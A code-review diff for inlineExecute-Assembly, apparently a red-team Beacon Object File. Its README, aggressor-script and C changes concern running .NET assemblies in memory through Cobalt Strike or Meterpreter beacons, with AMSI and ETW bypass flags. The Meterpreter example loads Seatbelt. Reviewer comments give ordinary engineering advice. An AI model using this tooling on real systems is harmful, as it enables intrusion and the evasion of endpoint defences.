11 changes: 11 additions & 0 deletions README.md
Expand Up @@ -142,6 +142,17 @@ beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --m
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit
```

### Use Case

> *Execute .NET assembly (Meterpreter Version)*

### Syntax

```
meterpreter > load bofloader
meterpreter > execute_bof path/to/inlineExecute-Assemblyx64.o --format-string ziiiiizzzb "totesLegit" 0 0 0 0 1 "totesLegit" "totesLegit" "" file:/root/Desktop/Seatbelt.exe
```

## Caveats

1. While I have tried to make this as stable as possible, there are no guarantees things will never crash and beacons won’t die. We don’t have the added luxury of fork and run where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can’t stress how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
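Review bot: the new Meterpreter syntax block gives a bare positional list (`"totesLegit" 0 0 0 0 1 "totesLegit" "totesLegit" "" file:...`) with no indication of what each value means, which is the main thing a reader of this section needs. Add a short mapping under the block, in the order of the `ziiiiizzzb` format string used by the `bof_pack` call in the .cna: appdomain name, amsi, etw, revertetw, mailslot, entrypoint, mailslot name, pipe name, assembly arguments, assembly file bytes. Also say explicitly that `file:` is what makes `execute_bof` read the assembly from disk and supply its length as the `b` payload, since the README's Cobalt Strike examples above pass `--dotnetassembly` instead.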
3 changes: 1 addition & 2 deletions inlineExecuteAssembly/inlineExecute-Assembly.cna
Expand Up @@ -340,7 +340,6 @@ alias inlineExecute-Assembly {

#Reading assembly bytes and get the size in bytes
$fileHandle = openf($_dotNetAssembly);
$assemblyLength = lof($_dotNetAssembly);
$assemblyBytes = readb($fileHandle, -1);
closef($fileHandle);

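Review bot: the comment `#Reading assembly bytes and get the size in bytes` is now stale, since the `lof()` size lookup is removed and the length travels inside the `b` payload instead; update it to say only that the assembly bytes are read.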
Expand All @@ -349,7 +348,7 @@ alias inlineExecute-Assembly {
#-------------------------------------- Package and ship it --------------------------------------#

# pack our arguments
$bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes);
$bofArgs = bof_pack($1, "ziiiiizzzb", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyBytes);

# announce what we're doing
btask($1, "Running inlineExecute-Assembly by (@anthemtotheego)");
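Review bot: dropping the separate `i` length and `$assemblyLength` from `bof_pack` is consistent with the C side, where `BeaconDataExtract` now fills `assemblyByteLen` from the `b` payload, but the format string is an interface contract shared with the README's `execute_bof --format-string ziiiiizzzb` example; note in the commit message or README that the old `ziiiiizzzib` layout is no longer accepted so users of the previous object file do not mix versions.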
5 changes: 2 additions & 3 deletions src/inlineExecute-Assembly.c
Expand Up @@ -336,7 +336,7 @@ void go(char* args, int length) {//Executes .NET assembly in memory
BOOL revertETW = 0;
BOOL mailSlot = 0;
ULONG entryPoint = 1;
size_t assemblyByteLen = 0;
int assemblyByteLen = 0;

//Extract data sent
appDomain = BeaconDataExtract(&parser, NULL);
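Review bot: changing `assemblyByteLen` from `size_t` to `int` matches the `int*` size parameter that `BeaconDataExtract` takes in the next hunk, but every later use of `assemblyByteLen` that previously received an unsigned `size_t` (buffer allocation, copy lengths, any SafeArray bound) now gets a signed `int`; check those call sites for an implicit sign conversion and reject a non-positive length before it reaches them.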
Expand All @@ -348,8 +348,7 @@ void go(char* args, int length) {//Executes .NET assembly in memory
slotName = BeaconDataExtract(&parser, NULL);
pipeName = BeaconDataExtract(&parser, NULL);
assemblyArguments = BeaconDataExtract(&parser, NULL);
assemblyByteLen = BeaconDataInt(&parser);
char* assemblyBytes = BeaconDataExtract(&parser, NULL);
char* assemblyBytes = BeaconDataExtract(&parser, &assemblyByteLen);

//Create slot and pipe names
SIZE_T pipeNameLen = MSVCRT$strlen(pipeName);
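Review bot: `char* assemblyBytes = BeaconDataExtract(&parser, &assemblyByteLen);` is followed directly by the slot and pipe name setup with no check on the result. If the caller packed an empty or missing `b` payload, `assemblyBytes` can be NULL and `assemblyByteLen` zero, and with a BOF there is no fork-and-run safety net (as the README caveat says, a crash takes the beacon with it). Add a guard right after the extract, e.g. `if (assemblyBytes == NULL || assemblyByteLen <= 0) { BeaconPrintf(CALLBACK_ERROR, "No assembly bytes received"); return; }`, before any allocation or loading uses the buffer.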